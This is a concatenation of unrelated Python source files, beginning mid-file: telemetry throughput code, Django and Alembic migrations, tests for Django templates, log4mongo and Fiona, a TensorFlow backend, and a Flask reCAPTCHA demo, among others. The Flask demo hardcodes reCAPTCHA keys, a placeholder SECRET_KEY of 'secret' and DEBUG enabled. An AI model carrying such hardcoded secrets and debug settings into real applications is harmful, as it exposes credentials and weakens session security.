if fields[5] == 'timeout_waiting_for_ack':
self.process_send_timeout({ 'identity': identity, 'message id': message_id })
elif fields[4] == 'read_from_disk':
identity,message_id = fields[0],fields[2]
self.process_deferred_read({ 'identity': identity, 'message id': message_id })
def process_lines_from_stream(self):
'''process any lines from our streams that are available to read'''
while True:
try:
l = self.input_stream.readline()
self.process_line(l)
except IOError:
# Nothing left to read at the moment
return
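# Illustrative sketch: feeding ThroughputCounter two of the sample telemetry lines
# quoted in process_line()'s docstring (one databurst and its matching ACK):
#
#   counter = ThroughputCounter()
#   counter.process_line('fishhook.engineroom.anchor.net.au 1395212041732118000 '
#                        '8c087c0b collator_thread created_databurst frames = 1618 '
#                        'compressed_bytes = 16921')
#   counter.process_line('fishhook.engineroom.anchor.net.au 1395212082492520000 '
#                        '8c087c0b poller_thread rx_ack_from broker msg_id = 5553')
#   counter.get_points_per_seconds([60])        # [mean points per second, last minute]
#   counter.get_total_outstanding_points()      # 0: the burst has been acked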
class ThroughputPrinter(object):
def __init__(self, counter, outstream=sys.stdout, avgtimes=(600,60,1)):
self.counter = counter
self.outstream = outstream
self.avgtimes = avgtimes
self.lines_printed = 0
def print_header(self):
colbreak = " " * 3
header = '#'
header += "mean points per second".center(29) + colbreak
header += "mean acks per second".center(30) + colbreak
header += "mean latency per point".center(30) + colbreak
header += "deferred points written/s".center(30) + colbreak
header += "deferred points read/s".center(30) + colbreak
header += "points timed out sending/s".center(30) + colbreak
header += "unacked".rjust(10) + '\n'
header += "#"
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)[1:]
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak
header += "".join(("(%dsec)" % secs).rjust(10) for secs in self.avgtimes)
header += colbreak + "points".rjust(10) + '\n'
header += '# ' + '-'*28 + colbreak + '-'*30 + colbreak + '-'*30
header += colbreak + '-'*30 + colbreak + '-'*30 + colbreak + '-'*30
header += colbreak + '-'*10 + '\n'
self.outstream.write(header)
self.outstream.flush()
def print_throughput(self):
bursts_per_second = self.counter.get_points_per_seconds(self.avgtimes)
acks_per_second = self.counter.get_acks_per_second(self.avgtimes)
mean_latencies = self.counter.get_average_latencies(self.avgtimes)
outstanding_points = self.counter.get_total_outstanding_points()
points_deferred_to_disk = self.counter.get_deferred_points_written_per_second(self.avgtimes)
points_read_from_disk = self.counter.get_deferred_points_read_per_second(self.avgtimes)
points_timed_out_sending = self.counter.get_timed_out_points_per_second(self.avgtimes)
# RENDER ALL THE THINGS!
out = ""
colbreak = " " * 3
out += "".join((" %9.2f" % b for b in bursts_per_second))
out += colbreak
out += "".join((" %9.2f" % b for b in acks_per_second))
out += colbreak
out += "".join((" %9.2f" % b for b in mean_latencies))
out += colbreak
out += "".join((" %9.2f" % b for b in points_deferred_to_disk))
out += colbreak
out += "".join((" %9.2f" % b for b in points_read_from_disk))
out += colbreak
out += "".join((" %9.2f" % b for b in points_timed_out_sending))
out += colbreak
out += "%10d" % outstanding_points + '\n'
if self.lines_printed % 20 == 0:
self.print_header()
self.outstream.write(out)
self.outstream.flush()
self.lines_printed += 1
if __name__ == '__main__':
# Make stdin non-blocking
fd = sys.stdin.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
reader = ThroughputCounter(sys.stdin)
writer = ThroughputPrinter(reader, sys.stdout)
# Run an event loop to process outstanding input every second
# and then output the processed data
event_loop = TimeAware(1, [ reader.process_lines_from_stream,
writer.print_throughput ])
event_loop.run_forever()
|
DEBUG = False
BASEDIR = ''
SUBDIR = ''
PREFIX = ''
QUALITY = 85
CONVERT = '/usr/bin/convert'
WVPS = '/usr/bin/wvPS'
PROCESSORS = (
'populous.thumbnail.processors.colorspace',
'populous.thumbnail.processors.autocrop',
'populous.thumbnail.processors.scale_and_crop',
'populous.thumbnail.processors.filters',
)
|
"""Fichier contenant l'action detruire_sortie."""
from primaires.scripting.action import Action
from primaires.scripting.instruction import ErreurExecution
class ClasseAction(Action):
"""Détruit une sortie d'une salle."""
@classmethod
def init_types(cls):
cls.ajouter_types(cls.detruire_sortie, "Salle", "str")
@staticmethod
def detruire_sortie(salle, direction):
"""Détruit une sortie de salle et sa réciproque de la destination.
La direction est à choisir parmi est, ouest, nord, sud, nord-est,
nord-ouest, sud-est, sud-ouest, haut et bas.
"""
try:
direction = salle.sorties.get_nom_long(direction)
except KeyError:
raise ErreurExecution("direction {} inconnue".format(direction))
if not salle.sorties.sortie_existe(direction):
raise ErreurExecution("sortie {} non définie".format(direction))
d_salle = salle.sorties[direction].salle_dest
dir_opposee = salle.sorties.get_nom_oppose(direction)
d_salle.sorties.supprimer_sortie(dir_opposee)
salle.sorties.supprimer_sortie(direction)
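# Hedged usage sketch: how this action might be invoked from a scripting script.
# The script syntax below is assumed for illustration, not taken from this file:
#
#   detruire_sortie salle "sud"
#
# which, per detruire_sortie() above, removes the "sud" exit of `salle` together
# with the opposite ("nord") exit of the destination room.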
|
from flask import Flask, render_template, flash, session, redirect, url_for
from wtforms import TextAreaField
from wtforms.validators import DataRequired
from flask.ext.wtf import Form
from flask.ext.wtf.recaptcha import RecaptchaField
DEBUG = True
SECRET_KEY = 'secret'
RECAPTCHA_PUBLIC_KEY = '6LeYIbsSAAAAACRPIllxA7wvXjIE411PfdB2gt2J'
RECAPTCHA_PRIVATE_KEY = '6LeYIbsSAAAAAJezaIq3Ft_hSTo0YtyeFG-JgRtu'
app = Flask(__name__)
app.config.from_object(__name__)
class CommentForm(Form):
comment = TextAreaField("Comment", validators=[DataRequired()])
recaptcha = RecaptchaField()
@app.route("/")
def index(form=None):
if form is None:
form = CommentForm()
comments = session.get("comments", [])
return render_template("index.html",
comments=comments,
form=form)
@app.route("/add/", methods=("POST",))
def add_comment():
form = CommentForm()
if form.validate_on_submit():
comments = session.pop('comments', [])
comments.append(form.comment.data)
session['comments'] = comments
flash("You have added a new comment")
return redirect(url_for("index"))
return index(form)
if __name__ == "__main__":
app.run()
|
from django.template import TemplateDoesNotExist, TemplateSyntaxError
from django.test import SimpleTestCase
from ..utils import setup
from .test_extends import inheritance_templates
class ExceptionsTests(SimpleTestCase):
@setup({'exception01': "{% extends 'nonexistent' %}"})
def test_exception01(self):
"""
Raise exception for invalid template name
"""
with self.assertRaises(TemplateDoesNotExist):
self.engine.render_to_string('exception01')
@setup({'exception02': '{% extends nonexistent %}'})
def test_exception02(self):
"""
Raise exception for invalid variable template name
"""
if self.engine.string_if_invalid:
with self.assertRaises(TemplateDoesNotExist):
self.engine.render_to_string('exception02')
else:
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('exception02')
@setup(
{'exception03': "{% extends 'inheritance01' %}"
"{% block first %}2{% endblock %}{% extends 'inheritance16' %}"},
inheritance_templates,
)
def test_exception03(self):
"""
Raise exception for extra {% extends %} tags
"""
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('exception03')
@setup(
{'exception04': "{% extends 'inheritance17' %}{% block first %}{% echo 400 %}5678{% endblock %}"},
inheritance_templates,
)
def test_exception04(self):
"""
Raise exception for custom tags used in child with {% load %} tag in parent, not in child
"""
with self.assertRaises(TemplateSyntaxError):
self.engine.get_template('exception04')
@setup({'exception05': '{% block first %}{{ block.super }}{% endblock %}'})
def test_exception05(self):
"""
Raise exception for block.super used in base template
"""
with self.assertRaises(TemplateSyntaxError):
self.engine.render_to_string('exception05')
|
import collections
from .settings import preferences_settings
from .exceptions import CachedValueNotFound, DoesNotExist
class PreferencesManager(collections.Mapping):
"""Handle retrieving / caching of preferences"""
def __init__(self, model, registry, **kwargs):
self.model = model
self.registry = registry
self.queryset = self.model.objects.all()
self.instance = kwargs.get('instance')
if self.instance:
self.queryset = self.queryset.filter(instance=self.instance)
@property
def cache(self):
from django.core.cache import caches
return caches['default']
def __getitem__(self, key):
return self.get(key)
def __setitem__(self, key, value):
section, name = self.parse_lookup(key)
self.update_db_pref(section=section, name=name, value=value)
def __repr__(self):
return repr(self.all())
def __iter__(self):
return self.all().__iter__()
def __len__(self):
return len(self.all())
def get_cache_key(self, section, name):
"""Return the cache key corresponding to a given preference"""
if not self.instance:
return 'dynamic_preferences_{0}_{1}_{2}'.format(self.model.__name__, section, name)
return 'dynamic_preferences_{0}_{1}_{2}_{3}'.format(self.model.__name__, section, name, self.instance.pk)
def from_cache(self, section, name):
"""Return a preference raw_value from cache"""
cached_value = self.cache.get(
self.get_cache_key(section, name), CachedValueNotFound)
if cached_value is CachedValueNotFound:
raise CachedValueNotFound
return self.registry.get(section=section, name=name).serializer.deserialize(cached_value)
def to_cache(self, pref):
"""Update/create the cache value for the given preference model instance"""
self.cache.set(
self.get_cache_key(pref.section, pref.name), pref.raw_value, None)
def pref_obj(self, section, name):
return self.registry.get(section=section, name=name)
def parse_lookup(self, lookup):
try:
section, name = lookup.split(
preferences_settings.SECTION_KEY_SEPARATOR)
except ValueError:
name = lookup
section = None
return section, name
def get(self, key, model=False):
"""Return the value of a single preference using a dotted path key"""
section, name = self.parse_lookup(key)
if model:
            return self.get_db_pref(section=section, name=name)
try:
return self.from_cache(section, name)
except CachedValueNotFound:
pass
db_pref = self.get_db_pref(section=section, name=name)
self.to_cache(db_pref)
return db_pref.value
def get_db_pref(self, section, name):
try:
pref = self.queryset.get(section=section, name=name)
except self.model.DoesNotExist:
pref_obj = self.pref_obj(section=section, name=name)
pref = self.create_db_pref(
section=section, name=name, value=pref_obj.default)
return pref
def update_db_pref(self, section, name, value):
try:
db_pref = self.queryset.get(section=section, name=name)
db_pref.value = value
db_pref.save()
except self.model.DoesNotExist:
return self.create_db_pref(section, name, value)
return db_pref
def create_db_pref(self, section, name, value):
if self.instance:
db_pref = self.model(
section=section, name=name, instance=self.instance)
else:
db_pref = self.model(section=section, name=name)
db_pref.value = value
db_pref.save()
return db_pref
def all(self):
"""Return a dictionnary containing all preferences by section
Loaded from cache or from db in case of cold cache
"""
a = {}
try:
for preference in self.registry.preferences():
a[preference.identifier()] = self.from_cache(
preference.section, preference.name)
except CachedValueNotFound:
return self.load_from_db()
return a
def load_from_db(self):
"""Return a dictionnary of preferences by section directly from DB"""
a = {}
db_prefs = {p.preference.identifier(): p for p in self.queryset}
for preference in self.registry.preferences():
try:
db_pref = db_prefs[preference.identifier()]
except KeyError:
db_pref = self.create_db_pref(
section=preference.section, name=preference.name, value=preference.default)
self.to_cache(db_pref)
a[preference.identifier()] = self.from_cache(
preference.section, preference.name)
return a
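# Hedged usage sketch for PreferencesManager. The model and registry names below are
# hypothetical, and the '__' separator assumes the default value of
# preferences_settings.SECTION_KEY_SEPARATOR:
#
#   manager = PreferencesManager(model=PreferenceModel, registry=registry)
#   manager['general__site_title'] = 'My site'  # section 'general', name 'site_title'
#   manager['general__site_title']              # served from cache after the first DB hit
#   manager.all()                               # {identifier: value} for every registered preference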
|
import unittest
import helper.config
import mock
from vetoes import config
class FeatureFlagMixinTests(unittest.TestCase):
def test_that_flags_are_processed_during_initialize(self):
settings = helper.config.Data({
'features': {'on': 'on', 'off': 'false'}
})
consumer = config.FeatureFlagMixin(settings, mock.Mock())
self.assertTrue(consumer.feature_flags['on'])
self.assertFalse(consumer.feature_flags['off'])
    def test_that_invalid_flags_are_ignored(self):
settings = helper.config.Data({
'features': {'one': 'not valid', 'two': None}
})
consumer = config.FeatureFlagMixin(settings, mock.Mock())
self.assertEqual(consumer.feature_flags, {})
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "PolyTrend", cycle_length = 7, transform = "Logit", sigma = 0.0, exog_count = 20, ar_order = 12);
|
"""
Module containing functions to differentiate functions using tensorflow.
"""
try:
import tensorflow as tf
from tensorflow.python.ops.gradients import _hessian_vector_product
except ImportError:
tf = None
from ._backend import Backend, assert_backend_available
class TensorflowBackend(Backend):
def __init__(self):
if tf is not None:
self._session = tf.Session()
def __str__(self):
return "tensorflow"
def is_available(self):
return tf is not None
@assert_backend_available
def is_compatible(self, objective, argument):
if isinstance(objective, tf.Tensor):
if (argument is None or not
isinstance(argument, tf.Variable) and not
all([isinstance(arg, tf.Variable)
for arg in argument])):
raise ValueError(
"Tensorflow backend requires an argument (or sequence of "
"arguments) with respect to which compilation is to be "
"carried out")
return True
return False
@assert_backend_available
def compile_function(self, objective, argument):
if not isinstance(argument, list):
def func(x):
feed_dict = {argument: x}
return self._session.run(objective, feed_dict)
else:
def func(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(objective, feed_dict)
return func
@assert_backend_available
def compute_gradient(self, objective, argument):
"""
Compute the gradient of 'objective' and return as a function.
"""
tfgrad = tf.gradients(objective, argument)
if not isinstance(argument, list):
def grad(x):
feed_dict = {argument: x}
return self._session.run(tfgrad[0], feed_dict)
else:
def grad(x):
feed_dict = {i: d for i, d in zip(argument, x)}
return self._session.run(tfgrad, feed_dict)
return grad
@assert_backend_available
def compute_hessian(self, objective, argument):
if not isinstance(argument, list):
argA = tf.Variable(tf.zeros(tf.shape(argument)))
tfhess = _hessian_vector_product(objective, [argument], [argA])
def hess(x, a):
feed_dict = {argument: x, argA: a}
return self._session.run(tfhess[0], feed_dict)
else:
argA = [tf.Variable(tf.zeros(tf.shape(arg)))
for arg in argument]
tfhess = _hessian_vector_product(objective, argument, argA)
def hess(x, a):
feed_dict = {i: d for i, d in zip(argument+argA, x+a)}
return self._session.run(tfhess, feed_dict)
return hess
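# Hedged usage sketch (assumes TensorFlow 1.x graph mode, where tf.Session,
# tf.gradients and feed_dict-style evaluation are available):
#
#   import numpy as np
#   x = tf.Variable(tf.zeros([3]))
#   cost = tf.reduce_sum(tf.square(x))
#   backend = TensorflowBackend()
#   f = backend.compile_function(cost, x)
#   grad = backend.compute_gradient(cost, x)
#   f(np.ones(3))                               # -> 3.0
#   grad(np.ones(3))                            # -> array([ 2.,  2.,  2.])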
|
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
import photolib.models
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
('taggit', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),
('uuid', models.CharField(max_length=32, blank=True)),
('filename', models.CharField(help_text='A descriptive file name', max_length=128)),
('alt', models.CharField(help_text='alt attribute text for accessibility', max_length=255, blank=True)),
('caption', models.TextField(help_text='Recommended text to be used as photo caption.', blank=True)),
('notes', models.TextField(help_text='Any other notable information about this photo.', blank=True)),
('credits', models.TextField(help_text='Credits and copyright/left.', blank=True)),
('source', models.CharField(choices=[('Flickr', 'Flickr'), ('iStockphoto', 'iStockphoto')], max_length=32, blank=True)),
('source_url', models.URLField(help_text='Important when citation requires link to source.', blank=True)),
('image', models.ImageField(upload_to=photolib.models.upload_path)),
('uploaded', models.DateTimeField(default=datetime.datetime.utcnow)),
('last_updated', models.DateTimeField(default=datetime.datetime.utcnow, blank=True)),
('photo_tags', taggit.managers.TaggableManager(verbose_name='Tags', to='taggit.Tag', help_text='A comma-separated list of tags.', through='taggit.TaggedItem', blank=True)),
],
options={
'ordering': ('-uploaded',),
},
bases=(models.Model,),
),
]
|
"""empty message
Revision ID: 2357b6b3d76
Revises: fecca96b9d
Create Date: 2015-10-27 10:26:52.074526
"""
revision = '2357b6b3d76'
down_revision = 'fecca96b9d'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('citizen_complaints', sa.Column('service_type', sa.String(length=255), nullable=True))
op.add_column('citizen_complaints', sa.Column('source', sa.String(length=255), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('citizen_complaints', 'source')
op.drop_column('citizen_complaints', 'service_type')
### end Alembic commands ###
|
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Person.education'
db.add_column('person_person', 'education',
self.gf('django.db.models.fields.CharField')(default='', max_length=255, blank=True),
keep_default=False)
# Adding field 'Person.birthday'
db.add_column('person_person', 'birthday',
self.gf('django.db.models.fields.DateTimeField')(null=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Person.education'
db.delete_column('person_person', 'education')
# Deleting field 'Person.birthday'
db.delete_column('person_person', 'birthday')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'person.person': {
'Meta': {'object_name': 'Person'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'education': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'default': "'unknown'", 'max_length': '7'}),
'nickname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'occupation': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'normal'", 'max_length': '20'}),
'subscribing': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['person']
|
"""
Given a positive integer n and you can do operations as follow:
If n is even, replace n with n/2.
If n is odd, you can replace n with either n + 1 or n - 1.
What is the minimum number of replacements needed for n to become 1?
Example 1:
Input:
8
Output:
3
Explanation:
8 -> 4 -> 2 -> 1
Example 2:
Input:
7
Output:
4
Explanation:
7 -> 8 -> 4 -> 2 -> 1
or
7 -> 6 -> 3 -> 2 -> 1
"""
class Solution(object):
def integerReplacement(self, n):
"""
:type n: int
:rtype: int
"""
count = 0
while n > 1:
count += 1
if n % 2 == 0:
                n //= 2
elif (n+1) % 4 == 0 and (n-1) > 2:
n += 1
else:
n -= 1
return count
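# Why the greedy choice above works: when n is odd and n % 4 == 3 (i.e. (n+1) % 4 == 0),
# adding 1 yields a multiple of 4 and so allows two halvings in a row, whereas
# subtracting 1 allows only one. The (n-1) > 2 guard excludes n == 3, where
# 3 -> 2 -> 1 beats 3 -> 4 -> 2 -> 1. Illustrative checks matching the docstring:
#
#   Solution().integerReplacement(8)            # -> 3  (8 -> 4 -> 2 -> 1)
#   Solution().integerReplacement(7)            # -> 4  (7 -> 8 -> 4 -> 2 -> 1)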
|
import sys, os
sys.path.insert(0, os.path.abspath('..'))
extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'django-intercom'
copyright = u'2012, Ken Cochrane'
sys.path.insert(0, os.pardir)
m = __import__("intercom")
version = m.__version__
release = version
exclude_patterns = ['_build']
pygments_style = 'sphinx'
html_theme = 'default'
html_static_path = ['_static']
htmlhelp_basename = 'django-intercomdoc'
latex_elements = {
}
latex_documents = [
('index', 'django-intercom.tex', u'django-intercom Documentation',
u'Ken Cochrane', 'manual'),
]
man_pages = [
('index', 'django-intercom', u'django-intercom Documentation',
[u'Ken Cochrane'], 1)
]
texinfo_documents = [
('index', 'django-intercom', u'django-intercom Documentation',
u'Ken Cochrane', 'django-intercom', 'One line description of project.',
'Miscellaneous'),
]
epub_title = u'django-intercom'
epub_author = u'Ken Cochrane'
epub_publisher = u'Ken Cochrane'
epub_copyright = u'2012, Ken Cochrane'
|
from log4mongo.handlers import MongoHandler
from pymongo.errors import PyMongoError
from StringIO import StringIO
import unittest
import logging
import sys
class TestMongoHandler(unittest.TestCase):
host_name = 'localhost'
database_name = 'log4mongo_test'
collection_name = 'logs_test'
def setUp(self):
self.handler = MongoHandler(host=self.host_name, database_name=self.database_name, collection=self.collection_name)
self.log = logging.getLogger('testLogger')
self.log.setLevel(logging.DEBUG)
self.log.addHandler(self.handler)
        self.old_stderr = sys.stderr
sys.stderr = StringIO()
def tearDown(self):
self.handler.connection.drop_database(self.database_name)
self.handler.close()
self.log.removeHandler(self.handler)
self.log = None
self.handler = None
sys.stderr.close()
sys.stderr = self.old_stderr
def test_connect(self):
handler = MongoHandler(host='localhost', database_name=self.database_name, collection=self.collection_name)
self.assertTrue(isinstance(handler, MongoHandler))
self.handler.connection.drop_database(self.database_name)
handler.close()
def test_connect_failed(self):
with self.assertRaises(PyMongoError):
MongoHandler(host='unknow_host', database_name=self.database_name, collection=self.collection_name)
def test_connect_failed_silent(self):
handler = MongoHandler(host='unknow_host', database_name=self.database_name, collection=self.collection_name, fail_silently=True)
self.assertTrue(isinstance(handler, MongoHandler))
self.handler.connection.drop_database(self.database_name)
handler.close()
def test_emit(self):
self.log.warning('test message')
document = self.handler.collection.find_one({'message': 'test message', 'level': 'WARNING'})
self.assertEqual(document['message'], 'test message')
self.assertEqual(document['level'], 'WARNING')
def test_emit_exception(self):
try:
raise Exception('exc1')
except:
self.log.exception('test message')
document = self.handler.collection.find_one({'message': 'test message', 'level': 'ERROR'})
self.assertEqual(document['message'], 'test message')
self.assertEqual(document['level'], 'ERROR')
self.assertEqual(document['exception']['message'], 'exc1')
def test_emit_fail(self):
self.handler.collection = ''
self.log.warn('test warning')
self.assertRegexpMatches(sys.stderr.getvalue(), r"AttributeError: 'str' object has no attribute 'save'")
    def test_emit_fail_silent(self):
self.handler.fail_silently = True
self.handler.collection = ''
        self.log.warn('test warning')
self.assertEqual(sys.stderr.getvalue(), '')
def test_contextual_info(self):
self.log.info('test message with contextual info', extra={'ip': '127.0.0.1', 'host': 'localhost'})
document = self.handler.collection.find_one({'message': 'test message with contextual info', 'level': 'INFO'})
self.assertEqual(document['message'], 'test message with contextual info')
self.assertEqual(document['level'], 'INFO')
self.assertEqual(document['ip'], '127.0.0.1')
self.assertEqual(document['host'], 'localhost')
def test_contextual_info_adapter(self):
adapter = logging.LoggerAdapter(self.log, {'ip': '127.0.0.1', 'host': 'localhost'})
adapter.info('test message with contextual info')
document = self.handler.collection.find_one({'message': 'test message with contextual info', 'level': 'INFO'})
self.assertEqual(document['message'], 'test message with contextual info')
self.assertEqual(document['level'], 'INFO')
self.assertEqual(document['ip'], '127.0.0.1')
self.assertEqual(document['host'], 'localhost')
class TestCappedMongoHandler(TestMongoHandler):
capped_max = 10
def setUp(self):
self.handler = MongoHandler(host=self.host_name, database_name=self.database_name,
collection=self.collection_name, capped=True, capped_max=self.capped_max)
self.log = logging.getLogger('testLogger')
self.log.setLevel(logging.DEBUG)
self.log.addHandler(self.handler)
        self.old_stderr = sys.stderr
sys.stderr = StringIO()
def test_capped(self):
options = self.handler.db.command('collstats', self.collection_name)
self.assertEqual(options['max'], 10)
self.assertEqual(options['capped'], 1)
def test_capped_max(self):
for i in range(self.capped_max * 2):
self.log.info('test capped info')
documents = self.handler.collection.find()
self.assertEqual(documents.count(), 10)
def test_override_no_capped_collection(self):
# Creating no capped handler
self.handler_no_capped = MongoHandler(host=self.host_name, database_name=self.database_name, collection=self.collection_name)
self.log.removeHandler(self.handler)
self.log.addHandler(self.handler_no_capped)
self.log.info('test info')
# Creating capped handler
self.handler_capped = MongoHandler(host=self.host_name, database_name=self.database_name,
collection=self.collection_name, capped=True, capped_max=self.capped_max)
self.log.addHandler(self.handler)
self.log.info('test info')
def test_override_capped_collection(self):
# Creating capped handler
self.handler_capped = MongoHandler(host=self.host_name, database_name=self.database_name,
collection=self.collection_name, capped=True, capped_max=self.capped_max)
self.log.removeHandler(self.handler)
self.log.addHandler(self.handler)
self.log.info('test info')
# Creating no capped handler
self.handler_no_capped = MongoHandler(host=self.host_name, database_name=self.database_name, collection=self.collection_name)
self.log.addHandler(self.handler_no_capped)
self.log.info('test info')
|
import logging
import os
import os.path
import shutil
import sys
import tempfile
import unittest
import pytest
import fiona
from fiona.collection import supported_drivers
from fiona.errors import FionaValueError, DriverError, SchemaError, CRSError
from fiona.ogrext import calc_gdal_version_num, get_gdal_version_num
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
class ReadingTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@pytest.mark.skipif(not os.path.exists('tests/data/coutwildrnp.gpkg'),
reason="Requires geopackage fixture")
def test_gpkg(self):
if get_gdal_version_num() < calc_gdal_version_num(1, 11, 0):
self.assertRaises(DriverError, fiona.open, 'tests/data/coutwildrnp.gpkg', 'r', driver="GPKG")
else:
with fiona.open('tests/data/coutwildrnp.gpkg', 'r', driver="GPKG") as c:
self.assertEquals(len(c), 48)
class WritingTest(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.tempdir)
@pytest.mark.skipif(not os.path.exists('tests/data/coutwildrnp.gpkg'),
reason="Requires geopackage fixture")
def test_gpkg(self):
schema = {'geometry': 'Point',
'properties': [('title', 'str')]}
crs = {
'a': 6370997,
'lon_0': -100,
'y_0': 0,
'no_defs': True,
'proj': 'laea',
'x_0': 0,
'units': 'm',
'b': 6370997,
'lat_0': 45}
path = os.path.join(self.tempdir, 'foo.gpkg')
if get_gdal_version_num() < calc_gdal_version_num(1, 11, 0):
self.assertRaises(DriverError,
fiona.open,
path,
'w',
driver='GPKG',
schema=schema,
crs=crs)
else:
with fiona.open(path, 'w',
driver='GPKG',
schema=schema,
crs=crs) as c:
c.writerecords([{
'geometry': {'type': 'Point', 'coordinates': [0.0, 0.0]},
'properties': {'title': 'One'}}])
c.writerecords([{
'geometry': {'type': 'Point', 'coordinates': [2.0, 3.0]},
'properties': {'title': 'Two'}}])
with fiona.open(path) as c:
self.assertEquals(c.schema['geometry'], 'Point')
self.assertEquals(len(c), 2)
|
"""Basic infrastructure for extracting localizable messages from source files.
This module defines an extensible system for collecting localizable message
strings from a variety of sources. A native extractor for Python source files
is builtin, extractors for other sources can be added using very simple plugins.
The main entry points into the extraction functionality are the functions
`extract_from_dir` and `extract_from_file`.
"""
import os
import sys
from tokenize import generate_tokens, COMMENT, NAME, OP, STRING
from babel.util import parse_encoding, pathmatch, relpath
from textwrap import dedent
__all__ = ['extract', 'extract_from_dir', 'extract_from_file']
__docformat__ = 'restructuredtext en'
GROUP_NAME = 'babel.extractors'
DEFAULT_KEYWORDS = {
'_': None,
'gettext': None,
'ngettext': (1, 2),
'ugettext': None,
'ungettext': (1, 2),
'dgettext': (2,),
'dngettext': (2, 3),
'N_': None
}
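# How to read the keyword specs above: a value of None means the first argument is the
# localizable string (e.g. gettext(message)); a tuple lists the 1-based positions of the
# arguments holding localizable strings, so ngettext(singular, plural, n) maps to (1, 2)
# and dgettext(domain, message) maps to (2,). These specs drive the argument validation
# performed in extract() below.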
DEFAULT_MAPPING = [('**.py', 'python')]
empty_msgid_warning = (
'%s: warning: Empty msgid. It is reserved by GNU gettext: gettext("") '
'returns the header entry with meta information, not the empty string.')
def _strip_comment_tags(comments, tags):
"""Helper function for `extract` that strips comment tags from strings
    in a list of comment lines. This function operates in-place.
"""
def _strip(line):
for tag in tags:
if line.startswith(tag):
return line[len(tag):].strip()
return line
comments[:] = map(_strip, comments)
